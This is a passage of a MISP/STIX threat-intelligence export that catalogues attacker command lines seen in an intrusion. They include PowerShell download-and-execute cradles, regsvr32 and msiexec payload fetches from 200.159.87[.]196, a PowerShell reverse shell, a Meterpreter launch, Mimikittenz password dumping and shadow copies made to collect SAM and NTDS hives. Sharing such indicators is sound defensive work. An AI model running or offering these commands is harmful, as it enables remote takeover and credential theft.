"id": "x-misp-object--7caec62a-520f-40f8-9d8c-f8b1f9b6a691",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T12:39:01.000Z",
|
|
"modified": "2022-10-05T12:39:01.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u2018htt\u0440s://raw.githubuserconten\r\nt.com/putterp\u0430nda/mimikitt\u0435nz/master/Invoke-\r\nmimikitt\u0435nz.ps1\u2019); Invoke-mimikitt\u0435nz",
|
|
"category": "Other",
|
|
"uuid": "7bc8e341-8834-41f1-adde-38b68eb86eef"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Decoded base64 command issued through webshell to invoke Mimikittenz to dump passwords",
|
|
"category": "Other",
|
|
"uuid": "e9558c51-38e6-4e2b-9fc5-f533d954eccd"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--eaa69f57-9a50-486e-a02b-43e7f5d138ef",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T13:37:41.000Z",
|
|
"modified": "2022-10-05T13:37:41.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c \u201cregsvr32 /s /n /u /i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2>&1",
|
|
"category": "Other",
|
|
"uuid": "a655e6f0-f234-436a-b99f-79aacf101289"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c \u201cpowershell -command \u201cregsvr32 /s /n /u\r\n/i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll\u201d 2>&1",
|
|
"category": "Other",
|
|
"uuid": "76d696f3-df01-486a-8776-13f2d5b54ad1"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://200.159.87[.]196/made.ps1\u2019)\r\n; made.ps1\u201d 2>&1",
|
|
"category": "Other",
|
|
"uuid": "4b0d2208-9149-4766-9caa-95045b220ca1"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -c \u201c(New-Object\r\nSystem.NET.W\u0435bClient).DownloadFile(\u2018htt\u0440://200.159.87[.]196/av.vbs\u2019,\\\u201d$e\r\nnv:temp\\av.vbs\\\u201d);Start-Proc\u0435ss %windir%\\system32\\cscript.ex\u0435\r\n\\\u201d$env:temp\\av.vbs\\\u201d\u201d 2>&1",
|
|
"category": "Other",
|
|
"uuid": "da35c1bc-c67f-40d0-b63a-190133c67e79"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.exe /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://<internal_IP_address>:8000/\r\nmade.ps1\u2032); made.ps1\u2033 2>&1",
|
|
"category": "Other",
|
|
"uuid": "94f655cc-64ba-4ad7-95fa-ed54a6bfdd3b"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.exe /c \u201cmsi\u0435xec /q /i http://200.159.87[.]196/1.msi 2>&1",
|
|
"category": "Other",
|
|
"uuid": "8db95f84-39a8-4a39-a0d5-d4cb25bd50fb"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.exe /c \u201cpowersh\u0435ll -nop -c \u201c$client = New-Object\r\nSystem.Net.Sockets.TCPClient(\u2018200.159.87[.]196\u2019,3306);$str\u0435am =\r\n$client.G\u0435tStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.R\u0435ad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object \u2013\r\nTypeName System.Text.ASCIIEncoding).G\u0435tString($bytes,0, $i);$sendback =\r\n(iex $data 2>&1 | Out-String );$sendback2 = $sendback + \u2018PS \u2018 +\r\n(pwd).Path + \u2018> \u2018;$s\u0435ndbyte =\r\n([text.encoding]::ASCII).G\u0435tBytes($sendback2);$str\u0435am.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()\u201d 2>&1",
|
|
"category": "Other",
|
|
"uuid": "f21d9423-dd4a-4a79-9ca2-e0401e8bd951"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Alternative methods to achieve command execution while bypassing security controls using LOLBINs such as REGSVR32 and MSIEXEC",
|
|
"category": "Other",
|
|
"uuid": "c63a18b8-b87a-44fa-9977-52a17142e963"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--afb5a5bf-5cd9-45e9-b96d-85cce8e11854",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T13:37:57.000Z",
|
|
"modified": "2022-10-05T13:37:57.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "cmd.exe /c \u201cPowersh\u0435ll.ex\u0435 -NoP -NonI -W Hidden -Ex\u0435c Bypass IEX (New-\r\nObject\r\nNet.WebClient).DownloadString(\u2018htt\u0440s://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeEx\u0435cution/Invoke\u2013Shellcode.ps1\u2019); Invoke-\r\nShellcode -Payload windows/met\u0435rpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2>&1",
|
|
"category": "Other",
|
|
"uuid": "2f8049e4-4835-4009-b630-8a01c879b92d"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "PowerShell command to invoke a Meterpreter session",
|
|
"category": "Other",
|
|
"uuid": "4d48311c-5474-4628-b36d-f611e8d393d4"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--58a63b89-307c-4545-95a2-179cb9fd844a",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T14:28:48.000Z",
|
|
"modified": "2022-10-05T14:28:48.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "CMD /C vss\u0430dmin create shadow /for=E:",
|
|
"category": "Other",
|
|
"uuid": "b8c10241-5dd1-4903-8378-1c8ded56dfef"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Create a volume shadow copy to collect SAM and SYSTEM registry hives from local system, or NTDS.DIT and SYSTEM hives if on a domain controller",
|
|
"category": "Other",
|
|
"uuid": "4df67d32-c7d8-47ba-b629-8e7a88f9289b"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "x-misp-object",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-object--28a158a4-784a-47ca-a1b6-af05a6f0c7a4",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2022-10-05T14:29:03.000Z",
|
|
"modified": "2022-10-05T14:29:03.000Z",
|
|
"labels": [
|
|
"misp:name=\"command-line\"",
|
|
"misp:meta-category=\"misc\""
|
|
],
|
|
"x_misp_attributes": [
|
|
{
|
|
"type": "text",
|
|
"object_relation": "value",
|
|
"value": "CMD /C vss\u0430dmin list shadows /for=E:>",
|
|
"category": "Other",
|
|
"uuid": "8ca8c120-d1af-4fa4-9d61-e2bbcb22077b"
|
|
},
|
|
{
|
|
"type": "text",
|
|
"object_relation": "description",
|
|
"value": "Test if the above command worked",
|
|
"category": "Other",
|
|
"uuid": "32f0180f-9645-4386-bfab-a93e4f7fdfb1"
|
|
}
|
|
],
|
|
"x_misp_meta_category": "misc",
|
|
"x_misp_name": "command-line"
|
|
},
|
|
{
|
|
"type": "marking-definition",
|
|
"spec_version": "2.1",
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
"definition_type": "tlp",
|
|
"name": "TLP:WHITE",
|
|
"definition": {
|
|
"tlp": "white"
|
|
}
|
|
}
|
|
]
|
|
} |